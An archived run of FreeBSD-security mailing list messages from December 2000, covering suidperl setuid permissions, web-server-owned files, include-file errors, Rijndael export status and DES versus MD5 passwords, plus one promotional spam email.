<20001211182301.A1411@citusc.usc.edu> References: <000901c063c1$d5b809e0$3cfdf2c8@nirvana> <20001211173908.A77758@peitho.fxp.org> <008001c063db$14e00ff0$9ffdf2c8@nirvana> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="0F1p//8PRICkK4MW" Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <008001c063db$14e00ff0$9ffdf2c8@nirvana>; from sama@supridad.com.br on Mon, Dec 11, 2000 at 10:30:14PM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --0F1p//8PRICkK4MW Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Mon, Dec 11, 2000 at 10:30:14PM -0300, Roberto Samarone Araujo (RSA) wrote: > > /usr/bin/suidperl is no longer suid by default (see mailing list archives > > for the discussions). You will need to manually set its permissions > and/or > > add 'ENABLE_SUIDPERL=true' in /etc/make.conf and rebuild the system. > > > Ok, thanks ... but, are there any way to recompile only Perl ? All you need to do is add back the setuid bit, I thought. Kris --0F1p//8PRICkK4MW Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iQCVAwUBOjWMAVUuHi5z0oilAQGotwP8Da4ylsnyvov8GuiRAtc8tGlz/ei8qgOa VjfTAimdqYQ9HHErkxT6e2O/UtKBrYz3iUuz6AJZZVQ3lZqBs6HDBKN1dqFR8vpe 7GeXlmnbSIgjX74IW3Iweee8+QkulOsUsH9k0GQ89vwViS3mcsHWSt/Ln1RzWoBw o33KkHZnblk= =M3JD -----END PGP SIGNATURE----- --0F1p//8PRICkK4MW-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 21:45:29 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 21:45:25 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from neptune.entic.net (unknown [63.125.62.132]) by hub.freebsd.org (Postfix) with SMTP id 24E0637B402 for ; Mon, 11 Dec 2000 21:45:24 -0800 (PST) Received: (qmail 69907 invoked by uid 100); 12 Dec 2000 05:45:20 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 12 Dec 2000 05:45:20 -0000 Date: Tue, 12 Dec 2000 05:45:20 +0000 (GMT) From: Anil Jangity To: Cc: , Subject: Can't remove uid "nobody" files... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org IHAU who created some files (don't know how) but I can't seem to remove them: id: uid=1527(roki) gid=1000(shell) groups=1000(shell) FreeBSD mars 4.2-STABLE FreeBSD 4.2-STABLE #0: Sun Dec 10 11:07:18 GMT 2000 root@mars:/src/sys/compile/kernel.mars i386 roki@mars: ~/public_html/cgi-bin/UltraBoard/Private/Backups % ls -loa index.html -rw-r--r-- 1 nobody shell - 143 Sep 25 22:48 index.html roki@mars: ~/public_html/cgi-bin/UltraBoard/Private/Backups % pwd /home/roki/public_html/cgi-bin/UltraBoard/Private/Backups Two questions: 1. How did he create a file with permissions "nobody"? I tried to do the same and I either get operation not permitted or it really creates the file with my uid and not as uid nobody. I even tried to tar -cvf up a file with uid nobody and then tried to extrat it as normal user... just to see 2. How do I remove them? (I haven't tried to do it as root... just yet) Thanks in advance. PS: When replying please make sure my email address is there - not subscribed to -questions. Kind regards, Anil Jangity (Taos) anil@taos.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Dec 12 4: 1:34 2000 From owner-freebsd-security@FreeBSD.ORG Tue Dec 12 04:01:28 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 0203237B400; Tue, 12 Dec 2000 04:01:28 -0800 (PST) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id HAA82996; Tue, 12 Dec 2000 07:08:19 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Tue, 12 Dec 2000 07:08:18 -0500 (EST) From: Ralph Huntington To: Anil Jangity Cc: freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG Subject: Re: Can't remove uid "nobody" files... In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Files owned by user 'nobody' are usually created by the web server (http daemon running as 'nobody') in a world-writable directory that is generally owned by the user who owns the script that causes the files to be written. It's actually rather common, if not good practice (cgi 'wrappers' are a better way, IMO). If the directory is no longer world-writable, you'll need to be root to remove them (or the user who owns the directory in which the files reside). -=r=- On Tue, 12 Dec 2000, Anil Jangity wrote: > IHAU who created some files (don't know how) but I can't seem to remove > them: > > id: > uid=1527(roki) gid=1000(shell) groups=1000(shell) > > > FreeBSD mars 4.2-STABLE FreeBSD 4.2-STABLE #0: Sun Dec 10 > 11:07:18 GMT 2000 root@mars:/src/sys/compile/kernel.mars i386 > > roki@mars: ~/public_html/cgi-bin/UltraBoard/Private/Backups % ls -loa > index.html > -rw-r--r-- 1 nobody shell - 143 Sep 25 22:48 index.html > roki@mars: ~/public_html/cgi-bin/UltraBoard/Private/Backups % pwd > /home/roki/public_html/cgi-bin/UltraBoard/Private/Backups > > > > Two questions: > > 1. How did he create a file with permissions "nobody"? I tried to do the > same and I either get operation not permitted or it really creates the > file with my uid and not as uid nobody. I even tried to tar -cvf up a file > with uid nobody and then tried to extrat it as normal user... just to see > > 2. How do I remove them? (I haven't tried to do it as root... just yet) > > > Thanks in advance. > > PS: When replying please make sure my email address is there - not > subscribed to -questions. > > > Kind regards, > > Anil Jangity (Taos) > anil@taos.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Dec 12 6: 5:58 2000 From owner-freebsd-security@FreeBSD.ORG Tue Dec 12 06:05:55 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6786E37B400 for ; Tue, 12 Dec 2000 06:05:55 -0800 (PST) Received: from internet.eunet.sk (Internet.EUnet.sk [192.108.130.91]) by mx1.FreeBSD.org (Postfix) with ESMTP id BA6E96E2DBE for ; Tue, 12 Dec 2000 06:05:53 -0800 (PST) Received: from jurko ([195.12.128.49]) by internet.eunet.sk (8.9.1/8.9.3) with SMTP id PAA30088 for ; Tue, 12 Dec 2000 15:05:43 +0100 From: jucnik@ew.sk Message-ID: <3A362FFB.4000@ew.sk> Date: Tue, 12 Dec 2000 15:02:35 +0100 X-Mailer: Mozilla 3.03 (Win95; I) MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Interface Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello. I know this is off-topic, but does anybody know, why in include file is so many errors (defined struct: aaa struct sockaddr bbb instead of aaa struct sockaddr *bbb) ? i can't compile my progs without this functional... bye & thnx for reply juro@internet.sk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Dec 12 7:22:31 2000 From owner-freebsd-security@FreeBSD.ORG Tue Dec 12 07:22:28 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id AA1C237B400 for ; Tue, 12 Dec 2000 07:22:27 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id QAA61279; Tue, 12 Dec 2000 16:22:14 +0100 (CET) (envelope-from des@ofug.org) Sender: des@ofug.org X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Roberto Samarone Araujo (RSA)" Cc: Subject: Re: FreeBSD 4.2 and Suid files References: <000901c063c1$d5b809e0$3cfdf2c8@nirvana> From: Dag-Erling Smorgrav Date: 12 Dec 2000 16:22:13 +0100 In-Reply-To: "Roberto Samarone Araujo's message of "Mon, 11 Dec 2000 19:29:31 -0300" Message-ID: Lines: 10 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Roberto Samarone Araujo (RSA)" writes: > I have some suid perl scripts that was working fine on my FreeBSD > 3.5. When I took them to my new freebsd 4.2 box, they stopped to work. When > I try to execute them, the system show the message: "Can't do setuid" Type 'chmod u+s /usr/bin/suidperl' as root. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Dec 12 8:32:39 2000 From owner-freebsd-security@FreeBSD.ORG Tue Dec 12 08:32:37 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 3D13037B400 for ; Tue, 12 Dec 2000 08:32:33 -0800 (PST) Received: (qmail 46492 invoked by uid 1000); 12 Dec 2000 16:31:44 -0000 Date: Tue, 12 Dec 2000 18:31:44 +0200 From: Peter Pentchev To: security@FreeBSD.org Subject: [OT] [Fwd: Rijndael restrictions - are there any?] Message-ID: <20001212183144.G36405@ringworld.oblivion.bg> Mail-Followup-To: security@FreeBSD.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org OK, so I know this might be a bit off-topic here, but still.. :) So does anybody have any idea if there are any restrictions on code using Rijndael? Read-the-fine-document-at-the-end-of-this-link answers will be more than welcome :) G'luck, Peter -- This would easier understand fewer had omitted. ----- Forwarded message from Peter Pentchev ----- Date: Tue, 12 Dec 2000 15:43:47 +0200 From: Peter Pentchev To: ports@FreeBSD.org Subject: Rijndael restrictions - are there any? User-Agent: Mutt/1.2.5i Hi porters, I'm sitting on a port of aescrypt (http://aescrypt.sourceforge.net/) - a command-line Rijndael (AES) encryption/decryption utility. Nearly the only thing that's holding me back from committing it is that I'm not quite clear on Rijndael's export restrictions - should this port be marked RESTRICTED, NO_CDROM, NO_PACKAGE, or should there be an interactive pre-fetch confirmation (I hope not)? ----- End forwarded message ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Dec 12 8:39:57 2000 From owner-freebsd-security@FreeBSD.ORG Tue Dec 12 08:39:53 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id CE66837B69F for ; Tue, 12 Dec 2000 08:39:43 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id 86F8318C7; Tue, 12 Dec 2000 11:39:42 -0500 (EST) Date: Tue, 12 Dec 2000 11:39:42 -0500 From: Will Andrews To: Peter Pentchev Cc: security@FreeBSD.ORG Subject: Re: [OT] [Fwd: Rijndael restrictions - are there any?] Message-ID: <20001212113942.E840@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , Peter Pentchev , security@FreeBSD.ORG References: <20001212183144.G36405@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001212183144.G36405@ringworld.oblivion.bg>; from roam@orbitel.bg on Tue, Dec 12, 2000 at 06:31:44PM +0200 X-Operating-System: FreeBSD 4.2-STABLE i386 Sender: will@puck.firepipe.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Dec 12, 2000 at 06:31:44PM +0200, Peter Pentchev wrote: > I'm sitting on a port of aescrypt (http://aescrypt.sourceforge.net/) - > a command-line Rijndael (AES) encryption/decryption utility. Nearly > the only thing that's holding me back from committing it is that I'm not > quite clear on Rijndael's export restrictions - should this port be marked > RESTRICTED, NO_CDROM, NO_PACKAGE, or should there be an interactive pre-fetch > confirmation (I hope not)? No. Rijndael is exportable. -- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Dec 12 8:45:26 2000 From owner-freebsd-security@FreeBSD.ORG Tue Dec 12 08:45:23 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id B154537B400 for ; Tue, 12 Dec 2000 08:45:21 -0800 (PST) Received: (qmail 47162 invoked by uid 1000); 12 Dec 2000 16:44:27 -0000 Date: Tue, 12 Dec 2000 18:44:27 +0200 From: Peter Pentchev To: Will Andrews , security@FreeBSD.ORG Subject: Re: [OT] [Fwd: Rijndael restrictions - are there any?] Message-ID: <20001212184427.H36405@ringworld.oblivion.bg> Mail-Followup-To: Will Andrews , security@FreeBSD.ORG References: <20001212183144.G36405@ringworld.oblivion.bg> <20001212113942.E840@puck.firepipe.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001212113942.E840@puck.firepipe.net>; from will@physics.purdue.edu on Tue, Dec 12, 2000 at 11:39:42AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Dec 12, 2000 at 11:39:42AM -0500, Will Andrews wrote: > On Tue, Dec 12, 2000 at 06:31:44PM +0200, Peter Pentchev wrote: > > I'm sitting on a port of aescrypt (http://aescrypt.sourceforge.net/) - > > a command-line Rijndael (AES) encryption/decryption utility. Nearly > > the only thing that's holding me back from committing it is that I'm not > > quite clear on Rijndael's export restrictions - should this port be marked > > RESTRICTED, NO_CDROM, NO_PACKAGE, or should there be an interactive pre-fetch > > confirmation (I hope not)? > > No. Rijndael is exportable. Thanks! :) G'luck, Peter -- You have, of course, just begun reading the sentence that you have just finished reading. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Dec 12 8:59:24 2000 From owner-freebsd-security@FreeBSD.ORG Tue Dec 12 08:59:21 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 7343437B400 for ; Tue, 12 Dec 2000 08:58:18 -0800 (PST) Received: from [127.0.0.1] (helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 145soC-0000Ac-00; Tue, 12 Dec 2000 10:01:44 -0700 Sender: wes@FreeBSD.ORG Message-ID: <3A3659F8.B7C1F990@softweyr.com> Date: Tue, 12 Dec 2000 10:01:44 -0700 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: jucnik@ew.sk Cc: freebsd-security@freebsd.org Subject: Re: Interface References: <3A362FFB.4000@ew.sk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org jucnik@ew.sk wrote: > > Hello. > > I know this is off-topic, but does anybody know, why in include file > is so many errors (defined struct: aaa struct sockaddr bbb > instead of aaa struct sockaddr *bbb) ? > > i can't compile my progs without this functional... has no errors in it. Your program has an error, not including the other include files that needs. Locate the structures that are not defined in the include files and #include those before . Repeat until the errors go away. Or, poke through the system sources for another source file that includes and duplicate its list of include files. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 5:22: 9 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 05:22:08 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id C25F437B402 for ; Wed, 13 Dec 2000 05:22:07 -0800 (PST) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id IAA31761 for ; Wed, 13 Dec 2000 08:23:55 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Wed, 13 Dec 2000 08:23:55 -0500 (EST) From: Ralph Huntington To: freebsd-security@FreeBSD.ORG Subject: DES or MD5 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Which is more secure, inherently, DES or MD5 for passwords? Thanks, ralph To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 5:27: 5 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 05:27:01 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 8D5CE37B402 for ; Wed, 13 Dec 2000 05:26:59 -0800 (PST) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 146Bvr-0003ai-00; Wed, 13 Dec 2000 15:26:55 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id PAA09928; Wed, 13 Dec 2000 15:26:53 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 9517; Wed Dec 13 15:24:49 2000 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.16 #1) id 146Btp-0003YA-00; Wed, 13 Dec 2000 15:24:49 +0200 From: Sheldon Hearn To: Ralph Huntington Cc: freebsd-security@freebsd.org Subject: Re: DES or MD5 In-reply-to: Your message of "Wed, 13 Dec 2000 08:23:55 EST." Date: Wed, 13 Dec 2000 15:24:49 +0200 Message-ID: <13649.976713889@axl.fw.uunet.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 13 Dec 2000 08:23:55 EST, Ralph Huntington wrote: > Which is more secure, inherently, DES or MD5 for passwords? Thanks, ralph http://www.freebsd.org/handbook/crypt.html Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 5:27:57 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 05:27:54 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 9520537B400 for ; Wed, 13 Dec 2000 05:27:53 -0800 (PST) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id IAA31927; Wed, 13 Dec 2000 08:29:36 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Wed, 13 Dec 2000 08:29:36 -0500 (EST) From: Ralph Huntington To: Sheldon Hearn Cc: freebsd-security@freebsd.org Subject: Re: DES or MD5 In-Reply-To: <13649.976713889@axl.fw.uunet.co.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org thank you for the reference On Wed, 13 Dec 2000, Sheldon Hearn wrote: > > > On Wed, 13 Dec 2000 08:23:55 EST, Ralph Huntington wrote: > > > Which is more secure, inherently, DES or MD5 for passwords? Thanks, ralph > > http://www.freebsd.org/handbook/crypt.html > > Ciao, > Sheldon. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Dec 13 6:22: 5 2000 From owner-freebsd-security@FreeBSD.ORG Wed Dec 13 06:21:58 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from arka.ids.bielsko.pl (arka.ids.bielsko.pl [195.117.233.8]) by hub.freebsd.org (Postfix) with ESMTP id 88DD337B698 for ; Wed, 13 Dec 2000 06:21:40 -0800 (PST) Received: by arka.ids.bielsko.pl (8.9.3/8.9.3) id PAA05668 for freebsd-security@FreeBSD.org; Wed, 13 Dec 2000 15:19:11 +0100 (MET) Date: Wed, 13 Dec 2000 15:19:11 +0100 (MET) Message-Id: <200012131419.PAA05668@arka.ids.bielsko.pl> Subject: New European Promotional Contest From: office@euroleader.org MIME-Version: 1.0 To: freebsd-security@FreeBSD.org Content-Type: multipart/alternative; boundary="------------070C33C436192682FC31B74B" Sender: lider@arka.ids.bielsko.pl Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------070C33C436192682FC31B74B Content-Type: text/plain; charset=iso-8859-2 Content-Transfer-Encoding: 8bit Dear Sirs, We are very pleased to welcome you and present a new economic initiative for producers from all European countries - both western and eastern. FOR THE FIRST TIME - ON SUCH A LARGE SCALE - IN THE VERY HEART OF EUROPE! [Image] "EURO LEADER 2001" This is an honourable title and prestigious Promotional Emblem in European Promotional Contest. This is an effective tool of promotion and marketing in Europe by means of which it is much easier to reach western markets, increase export and gain new partners for cooperation in the field of production and investment. The contest is a Polish initiative. It will be settled in March, 2001 in Warsaw. Therefore it will bring the best commercial effects on a stable, almost 40-million prospective customers Polish market, having over 5% economic growth, which will soon become an integral market of European Union. Click http://www.euroleader.org/ and get acquainted with the details of the contest, enter for the European competition. It will bring you success and a good start in the XXI century! You are good but are you well-known? You will be well-known! Join us. Yours faithfully, INTERRES International Building Fair and Promotion - from Poland B2B - Internet Portal Tadeusz Ziobro - President. --------------070C33C436192682FC31B74B Content-Type: multipart/related; boundary="------------CEE33E5E78D696CB4E0EC941" --------------CEE33E5E78D696CB4E0EC941 Content-Type: text/html; charset=iso-8859-2 Content-Transfer-Encoding: 8bit
Dear Sirs,

We are very pleased to welcome you and present a new economic initiative
for producers from all European countries - both western and eastern.

FOR THE FIRST TIME - ON SUCH A LARGE SCALE - IN THE VERY HEART OF EUROPE!

"EURO LEADER 2001"

This is an honourable title and prestigious Promotional Emblem
in European Promotional Contest.

This is an effective tool of promotion and marketing in Europe
by means of which it is much easier to reach western markets,
increase export and gain new partners for cooperation in the
field of production and investment.




The contest is a Polish initiative.
It will be settled in March, 2001 in Warsaw. Therefore it will bring the best commercial effects on a stable, almost 40-million
prospective customers Polish market, having over 5% economic growth, which will soon become an integral market of European Union.

Click http://www.euroleader.org/ and get acquainted with the details of the contest, enter for the European competition.

It will bring you success and a good start in the XXI century!
You are good but are you well-known? You will be well-known! Join us.

Yours faithfully,

INTERRES International Building Fair and Promotion - from Poland
B2B - Internet Portal
Tadeusz Ziobro - President.
  --------------CEE33E5E78D696CB4E0EC941 Content-Type: image/jpeg Content-ID: Content-Transfer-Encoding: base64 Content-Disposition: inline; filename="C:\WINDOWS\TEMP\nsmail24.jpeg" /9j/4AAQSkZJRgABAgEASABIAAD//gAmRmlsZSB3cml0dGVuIGJ5IEFkb2JlIFBob3Rvc2hv cKggNS4w/+4ADkFkb2JlAGSAAAAAAf/bAIQADAgICAkIDAkJDBELCgsRFQ8MDA8VGBMTFRMT GBEMDAwMDAwRDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAENCwsNDg0QDg4QFA4ODhQU Dg4ODhQRDAwMDAwREQwMDAwMDBEMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8AAEQgA eAB4AwEiAAIRAQMRAf/dAAQACP/EAT8AAAEFAQEBAQEBAAAAAAAAAAMAAQIEBQYHCAkKCwEA AQUBAQEBAQEAAAAAAAAAAQACAwQFBgcICQoLEAABBAEDAgQCBQcGCAUDDDMBAAIRAwQhEjEF QVFhEyJxgTIGFJGhsUIjJBVSwWIzNHKC0UMHJZJT8OHxY3M1FqKygyZEk1RkRcKjdDYX0lXi ZfKzhMPTdePzRieUpIW0lcTU5PSltcXV5fVWZnaGlqa2xtbm9jdHV2d3h5ent8fX5/cRAAIC AQIEBAMEBQYHBwYFNQEAAhEDITESBEFRYXEiEwUygZEUobFCI8FS0fAzJGLhcoKSQ1MVY3M0 8SUGFqKygwcmNcLSRJNUoxdkRVU2dGXi8rOEw9N14/NGlKSFtJXE1OT0pbXF1eX1VmZ2hpam tsbW5vYnN0dXZ3eHl6e3x//aAAwDAQACEQMRAD8A1Prf9b+sdH6w/FxXtNRaHAOHCxP/ABx/ rF+8z7kv8Y//AIonf1AuVWjixQMIkxGy0kvVf+OP9Yv3mfcl/wCOP9Yv3mfcuVST/Zx/uhVl 6r/xyPrF+8z7kv8AxyPrF+8z7lysGJ7BJL2cf7oVZeq/8cj6xeLPuS/8cf6x6ElgB40WJ0bA wOoZQxcvN+wF8Cq1zNzC4/mWO3N9Jdz176jdOp6LhG7Pbhs6ZW5l2S9kize71Poh30/UPsUU /ZhIRMRr4K1cH/xyPrF+8z7kv/HH+sX7zPuXMXCltrxQ51lQMMe9u1zh+85ku2KHMAak6AfF Sezj/dH2KsvVf+OP9Yv3mfcl/wCOP9Yv3mfcuby8W/DybMXIbsupdssb4EIKXtYz+iFWXqv/ ABx/rF+8z7kv/HH+sX7zPuXKpI+zj/dCrL6L9UPrf1jrHWGYuU9oqDS4ho5SWJ/i3/8AFE3+ oUlD7cPf4eEVw7KvR//QB/jH/wDFE7+oFyq6r/GP/wCKJ39QLlVqYf5uPksO6kTHZTZexl9v oVOMPt2l+0fvbG+5yjsfsNm07AdpdGm4jdtn+qo69k9T6P0z6g0P+r2ZSzNpyH55rsx8tjSW NFR3N7/nS/euE6rhYmDknGxsxudskWW1tLaw4fmse4/pVu4f19zOm14eH0+hg6diV+nZTYPd cT/PWPsH8179/p7f+uLmsh1Lr7HUNLKXPc6tjuWtJ3NYY/dUOKOQSkZnQ6jb8UmmeBdRRm0X 5FZtpqe176hA3bTuDJP7zlu5n146n1LGzcPqbGXYuY39FWwBpoe33Uuqd+e1u3371zaSklCM iCRZG3gi1fFdZ9Q6ei5/Uq8DOwPVyWTdTlNe6B6fv25FW7Z9L6D1yasYnUMvCbc3FsNJyWen a9uj9k7jW1/5m/8AP2pZImUSAaP2KD3f+MSroeG5uV9g+0Z/UAYyS9wqbsDWb9rHfpLdv5q8 8Vh2flvwW9PfYX4tb/VqrdrsdG13pu+kxr/zmKvwJPZDFAwjwk34pKklYzcHJwbW05Ldj31s uaP5NjfUZ/0VXTwb1CHqv8W//iib/UKSX+Lf/wAUTf6hSUH/AII/wU9H/9EH+Mf/AMUTv6gX N4bcN2Qxuc+yvHOj7KQHPb/K2Pjcuk/xkf8Aiid/UC5XQ88d4Wni/mo+S07vqFH1K6I/6quo ZnOdjW2DOHUNoBDWtj6H7npb15xns6fXkuZ062y/GboLrWhhcf3mMb9Gv93ctofXvrNeTW6n YzBprFDOnxNRqA2RY76brXf6Vc67aXHYNrZO1p1gfmt/soYYZIk8Zu9Qo0skr1HQus5NLL6M O2yqwSx7QII4THonVxkDFOJZ9ocw2Nqj3FgO0vS+84LI97Hcb4hxxuPD83Erhl2P2NJJXP2P 1T7WMI4tn2ot3imPdt/fSPRuqjKGH9ls+1FnqCmPds/fS+8Yf87D5eP54/zf7/8Ac/rK4T2L TSV+3oPW6mF9mDcGjk7Z/wCpVKuqy2xtVTHPseYaxoJcT4bU6GbFMGUMkZiPzGMoyEfPhUYk bgsV0H1PPTMjqdXTOo9OZnNyn7WWy4PrMbvdtc1tlPt9yz7fq/1umo22YVrWDUnbMR4hqrYe dlYNjrsSw1WuY6v1G/Sa130/Td+Y530d6aMmPNCXtZIzrS8cuLhl5wUQRuCPN9K+v37ExsBn UX9Prz8gn7LVaXHZXG5w9X0nDds93sXl5MmdBOunCNXm5VeLbhtsP2a8h1lR1aXtMttG76Nv 8tARxY+CNE8Xj4KJt6r/ABb/APiib/UKSX+Lf/xRN/qFJM/8Ef4Kuj//0gf4yP8AxRO/qBc3 i4eRmOsZjsL3VVvuePBlY32OXSf4xzH1jJiYYNDwun+oNHQcrAtz6MAYV75xLyXudW+Yc5tP qO/P/dV/3PbwxNXoFtavl3mkFu/W1nSMTqVvTemYH2QYj9llr3Oc95j8xrnOayrX+2sIKeMu IA1V90PpP1eJ/wCbOIRYKSKTFroIb7ne87vaqeFbY/62NbZlMzdmG6Law1oEunZ+iLmqj0n6 2dHxekUdPyqrbHVsLLQGhzDJcY1P8pUr/rL0/H6zj5/SsYV011Gq6na2vfuPujZ+d/KXIQ+F 85LPz49iQ98Z/anIY+A8fqh+s/nI8f8AiNw5YcOP1D08Nh3Xf+Lqv/wmVJ//AIuKv/CJ/KVW 